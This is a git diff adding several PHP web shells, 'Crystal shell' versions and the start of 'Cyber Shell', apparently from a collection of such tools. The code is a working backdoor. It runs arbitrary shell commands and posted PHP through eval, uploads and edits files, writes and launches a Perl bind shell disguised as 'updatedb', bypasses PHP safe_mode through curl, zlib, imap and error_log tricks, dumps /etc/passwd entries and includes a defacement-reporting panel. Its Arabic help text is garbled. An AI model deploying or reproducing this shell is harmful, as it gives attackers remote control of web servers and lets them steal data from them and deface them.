+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "
    Download - OK. (".$sizef."??)
    ";
+}
+else
+{
+print "
    Something is wrong. Download - IS NOT OK
    ";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "<" , $string);
+$string = str_replace(">" , ">" , $string);
+$content = $content . $string;
+}
+
+echo "
    Edit file: $ef 
    
+
+
    
+
    ";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "
    saved -OK!
    ";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "
    eval code

    
+
    ";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "
    Results of PHP execution

    ";
+@eval(stripslashes($_POST['phpcode']));
+echo "
    ";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "
    Command: $cmd
    ";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "";}
+else{
+$directory = $directory . "";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "";}
+else{
+$directory = $directory . "";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "";}
+else{
+$file = $file . "";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "";}
+else{
+$file = $file . "";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "
    NameTypeSizeLast accessLast changePermsWriteRead
    $filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "YesNoYesNo
    $filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "YesNoYes
    No

    ";
+
+
+
+
+echo "
+
    
+Command:
+
+
+Directory:
+
    ";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "
    SAFE MOD IS ON
    
+Including from here: "
+. ini_get('safe_mode_include_dir') . "
    Exec here: " . ini_get('safe_mode_exec_dir'). "    ";}
+
+
+
+
+?>
+
+
+
    
+	
    
+	< 

    
+
+	
    
+	
+	:: 
+	Executed command ::
    
+	
+Command:";
+?>
+		f
    
+	 
    
+	
    
+	
    
+		Selectg 
    Bind port toÂ
    
+    
+
+
+
+ 
+ 
+
+
+
    
+	
    
+
+	
+	
+	::Edit/Create
+	file::"
    
+	 ÇáÊÍÑíÑ æÇáÇäÔÇÁ:

     Şã ÈæÖÚ ÇÓã Çáãáİ ÇáĞí ÊÑíÏ ÊÍÑíÑå İŞØ
    æÈÚÏ ĞÇáß ÇáÖÛØ Úáì config.php ãËÇá
    Edit
    ÓÊÙåÑ áß äÇİĞå ÈåÇ ãÍÊæíÇÊ Çáãáİ 
    æÇíÖÇ ğ ÇĞÇ ÇÑÏÊ ÇäÔÇÁ ãáİ İŞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ 
    æÈÚÏ ĞÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   .    ";}
+?>
+	
    
+	
     
    
+	
    	
+File to edit:
+
+
+
    ";
+?>
+	
    
+	
    
+                 ÑİÚ ÇáãáİÇÊ:

    Şã ÈÊÍÏíÏ Çáãáİ ÇáãÑÇÏ ÑİÚå 
    æÈÚÏ ĞÇáß Şã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ
    UPLOAD< .    ";}
+?>::
+	
+	
+					upload::Ņ
     
+		
+
+
+
+
    ";
+?>
+	
    	
+
+                  
     Defacer Zone-H
     
+
    
+ 					CRYSTAL-H:

    ÇÓã ÇáãÚáä Defacer
    ÇáãæŞÚ ÇáãÎÊÑŞ Victim
    æÖÚ ÇáÇÎÊÑÇŞ Çí äæÚ ÇáËÛÑå ÇáÊì ÇÓÊËãÑÊåÇ Attack Mode 
     ÓÈÈ ÇáÇÎÊÑÇŞ Attack Reason 
    áÇÑÓÇá ÇáÇÎÊÑÇŞ sand   
     áÑÄíå ÇÎÑ ÇáÊÍĞíÑÇÊ ÇáãÑÓáå ÈÇáãæŞÚ Attacks On Hold.    ";}
+?>                 
    
+                  
+
+                  Defacer 
+
+					Zone-h
    
+                  
+                    
+                    
+                    
+                      
+                    
    
+                  
+                    
+                    
+                      
    
+                        
+                          
+                          
+                            
     
    
+                          
+                          
+                            
+							
+                          
+                            
+                          
+                            
+                            
    
+							::Defacer:::è
+							 
+							
    
+							::Victim:::è
+							 
    
+							
+							Attack Mode:è
+							
    
+							
+							Attack Reason:è
+							
    
+                          
+                          
+                            
     
    
+                        
+                          
+                          
+                            
    
+							  :  
+							
+L 
+							
+							Attacks On Hold
+							
+L

    
+
    
+	
    
+	
+	 yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter|
+	: Web x
     
    
+
+
+
+
+
    
+
+  
+  
+  
+    
+  
    
+      
+        
+        
+          
+          
+          
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+        
+          
+          
+          
+          
+          
+          
    CRYSTAL-H
+			2006
    PPSCPCC
    1 
    2 3 4  5  6  7  8  
    9 10  11  12  1314 15 
    16  17  181920 21 22 
    23242526272829
    3031
    
+
+        
    
+
+
+
diff --git a/php/CrystalShell v.1.php b/php/CrystalShell v.1.php
new file mode 100644
index 0000000..4496b1d
--- /dev/null
+++ b/php/CrystalShell v.1.php	
@@ -0,0 +1,929 @@
+
+
+
+
+
+Crystal shell
+ 
+
+
    
+	
+		
    
+
     
    
+	
    
+
+	öCRYSTAL-H 
+	Crystal hack shellphp 2006-2007     
+0.2
    
+
    
+
+
+
    
+	
+	ON (secure)";
+
+
+}
+
+else {$safemode = false; $hsafemode = "OFF (not secure)";}
+echo("Safe-mode: $hsafemode");
+// PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm";
+	exit;
+}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
+else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
+echo("
    ");
+echo("Open base dir: $hopenbasedir");
+echo("
    ");
+echo "PostgreSQL: ";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "ON";}else{echo "OFF    ";}
+echo("
    ");
+echo "MSSQL: ";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "ON";}else{echo "OFF";}
+echo("
    ");
+echo "MySQL: ";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "ON"; } else { echo "OFF"; }
+echo("
    ");
+echo "PHP version: ".@phpversion()."";
+echo("
    ");
+echo "cURL: ".(($curl_on)?("ON"):("OFF"));
+
+echo("
    ");
+echo "Disable functions : ";
+if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+
+?>
+
    
+	
     
    
+
+	
+
    
+	
     
    
+
+    
+
+
+
+
    
+	
     
    
+	
    
+	
    
+
+
+
+		OS:  
    
+Server:  
+
+
    
+
+
+
    User: 
+
+	
+	
+	
+
+
    
+	    
+    1:
+
    
+
+
     
+ Back 
+
+	ğ
+phpinfo2
+
+
+
+ Tools4
+
+
+
+  
+
+Decoderi
+
+
+
+  
+	
+	
+ByPass`
+
+
+
+  
+	
+SQLÂ
+
+
+
+ Bind 
+	
+	
+	
+help
+sabout
+
+?
    
+
    
+[j 
+
+
+	
+	server 
+	: 
+	
+
+
+
+
+
+	
+	
+	
+	CGI v:          
+	 HTTP v:  Mail
+admin:         
+
+	
+  
    
+
+
+
+
+	
+	
+	:  IP
+	 SERVER: 
+	
+	
+
+
+
+
+
+	        
+
+	
+	                
+	
+	
+port
+	: 
+	
+	
+	
+	
+
    
+ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå

    ÚÒíÒí ÇáãÓÊÎÏã
    ÇĞÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑŞ
    æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ   .    ";}
+if ($act == "bindport"){
+echo "
    
+/bin/bash
+Port
+
+
+
    ";
+}
+if ($act == "tools"){
+	echo "
    
+File to edit:
+
+
+
    ";
+ echo "
    
+
    
+
+
    ";
+echo "
    
+
    Download here from:
+
+-->>:
+
+
+
    ";
+}
+if ($act == "about") {echo "
    Coding by:

    Super-Crystal
    &
    Mohajer22
    -----
    Thanks 
    TrYaG Team 
     ArabSecurityCenter Team 
    CRYSTAL-H Version:0 Beta phpshell code
    Saudi Arabic  .    ";}
+
+if ($act == "bind") {echo "
    CRYSTAL-H:

    -Connect Şã ÈÇáÖÛØ Úáì ÎíÇÑ.
    .- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ
    .-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì
    nc -lp 3333ÈßÊÇÈÉ ÇáãäİĞ - 
    ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá 
    Bind port to  :
     bind shell æåäíÆÇ ğ áß   .    ";}
+
+if ($act == "command") {echo "
    CRYSTAL-H:

    áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå  Select ------ x  ÇÖÛØ Úáì ÇáÎíÇÑ
    .- æÇĞÇ ÇÑÏÊ ßÊÇÈå  ÇáÇæÇãÑ ÈäİÓß ŞÏ ÊßÊİí ÈÇáÎíÇÑ
    Command   .    ";}
+
+if ($act == "team") {echo "
    Arab Security Center Team

    Super-Crystal
    Medo-HaCKer
    Anaconda
    Alsb0r
     ReeM-HaCK 
    NoOFa 
     AL-Alame
    The YounG HackeR
    Anti-Hack
    Thanks  .    ";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+
    
+
    Execute:
    
+";
+echo (" bypass safemode with copy ");
+echo "
    
+
    read file :
+
+
    ";
+echo (" bypass safemode with CuRl");
+echo "
    
+
    read file :
+
+
    ";
+echo (" bypass safemode with imap()");
+echo "
    
+
    
+
+
    ";
+echo (" bypass safemode with id()");
+echo "
    
+
    
+
+
    ";
+echo (" Exploit: error_log()");
+echo "
    
+
    
+
+
    ";
+}
+if ($act == "decoder"){
+echo (" replace Chr()");
+echo "
    
+
    
+
    
+
    ";
+}
+if ($act == "SQL"){
+echo ("   MySQL    ");
+echo "
    
+
     Username :
+\n
+password :
+\n
+\n
+
    ";
+}
+?>
+
+
+
+
    
+
+	
    
+	
+	
+	
+	
    
+	 
    
+	
     
+		
+			
    
+
+
+ Exploit: error_log() By * Super-Crystal  * 
+
+
+
+
+
+
     By  * Super-Crystal * TrYaG Team
    
+
+
+
+
    
+
+
+
    
+
    
+
+
+
    
+
    
+
+
+
+
    
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "
    ";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "
    ".$str."
    ";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "
    ";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."
     
    " ;
+echo "
    ";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("
    Sorry... File
+".htmlspecialchars($u1p)." dosen't exists or you don't have
+access.
    ");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "
    Download - OK. (".$sizef."??)
    ";
+}
+else
+{
+print "
    Something is wrong. Download - IS NOT OK
    ";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "<" , $string);
+$string = str_replace(">" , ">" , $string);
+$content = $content . $string;
+}
+
+echo "
    Edit file: $ef 
    
+
+
    
+
    ";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "
    saved -OK!
    ";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "
    eval code

    
+
    ";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "
    Results of PHP execution

    ";
+@eval(stripslashes($_POST['phpcode']));
+echo "
    ";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "
    Command: $cmd
    ";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "";}
+else{
+$directory = $directory . "";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "";}
+else{
+$directory = $directory . "";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "";}
+else{
+$file = $file . "";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "";}
+else{
+$file = $file . "";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "
    NameTypeSizeLast accessLast changePermsWriteRead
    $filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "YesNoYesNo
    $filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "YesNoYes
    No

    ";
+
+
+
+
+echo "
+
    
+Command:
+
+
+Directory:
+
    ";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "
    SAFE MOD IS ON
    
+Including from here: "
+. ini_get('safe_mode_include_dir') . "
    Exec here: " . ini_get('safe_mode_exec_dir'). "    ";}
+
+
+
+
+?> 


    
+
+	
    
+	
+	:: 
+	Executed command ::
    
+	
+Command:";
+?>
+		f
    
+	 
    
+	
    
+	
    
+		Selectg 
    Bind port toÂ
    
+    
+
+
+
+ 
+ 
+
+
+
    
+	
    
+
+	
+	
+	::Edit/Create
+	file::"
    
+	 ÇáÊÍÑíÑ æÇáÇäÔÇÁ:

     Şã ÈæÖÚ ÇÓã Çáãáİ ÇáĞí ÊÑíÏ ÊÍÑíÑå İŞØ
    æÈÚÏ ĞÇáß ÇáÖÛØ Úáì config.php ãËÇá
    Edit
    ÓÊÙåÑ áß äÇİĞå ÈåÇ ãÍÊæíÇÊ Çáãáİ 
    æÇíÖÇ ğ ÇĞÇ ÇÑÏÊ ÇäÔÇÁ ãáİ İŞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ 
    æÈÚÏ ĞÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   .    ";}
+?>
+	
    
+	
     
    
+	
    	
+File to edit:
+
+
+
    ";
+?>
+	
    
+	
    
+                 ÑİÚ ÇáãáİÇÊ:

    Şã ÈÊÍÏíÏ Çáãáİ ÇáãÑÇÏ ÑİÚå 
    æÈÚÏ ĞÇáß Şã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ
    UPLOAD< .    ";}
+?>::
+	
+	
+					upload::Ņ
     
+		
+
+
+
+
    ";
+?>
+	
    	

    
+	
    
+	
+	 yCrystal shell v. 0.2 pro  ©oded by Arab4Services.Com |Super-Crystal x
     
    
+
+
+
+
+
    
+
+ 
    
\ No newline at end of file
diff --git a/php/Cyber Shell (v 1.0).php b/php/Cyber Shell (v 1.0).php
new file mode 100644
index 0000000..2dda125
--- /dev/null
+++ b/php/Cyber Shell (v 1.0).php	
@@ -0,0 +1,1033 @@
+
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+";
+
+foreach($_POST as $key => $value) {$$key=$value;}
+foreach($_GET as $key => $value)  {$$key=$value;}
+
+if (isset($_GET[imgname]))
+{
+$img=array(
+'dir'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQABADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1mG6mv7ZbiBbxrhlUtJFMAiOVDbdjOAQAR26d880lzr2paU6T6hbp9gH+ulCKjJkqAQBK+4ZPPAqhDB4i0pXtbfRvtUYYFZluo0DAKq9Ccj7ufxqlq9n4p1qyksn0IQLKoQyNeRsF+dGzgdfu/rXi0ni4tJxZ2S9n3Vj/2Q==',
+'txt'=>
